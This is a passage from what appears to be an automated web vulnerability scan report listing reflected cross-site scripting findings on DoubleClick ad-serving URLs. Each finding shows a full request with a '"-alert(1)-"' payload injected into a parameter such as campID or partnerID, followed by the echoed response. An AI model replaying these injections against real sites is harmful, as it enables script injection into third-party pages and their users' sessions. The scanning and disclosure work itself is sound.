leclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%
...[SNIP]...

4.7. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb197"-alert(1)-"30566853739 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9127

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_im_f_anb_op_ScrFr_pk_300x250%26priorityCode%3D4654900000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

4.8. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26dad"-alert(1)-"eeefcf6670b was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
c%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%
...[SNIP]...

4.9. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a686a"-alert(1)-"12363754579 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype
...[SNIP]...

4.10. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4ac"-alert(1)-"f286bd5be45 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%
...[SNIP]...

4.11. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ae1"-alert(1)-"d5a8c8b632 was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9719

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
c%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl
...[SNIP]...

4.12. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1dd4"-alert(1)-"7f0ce352b24 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%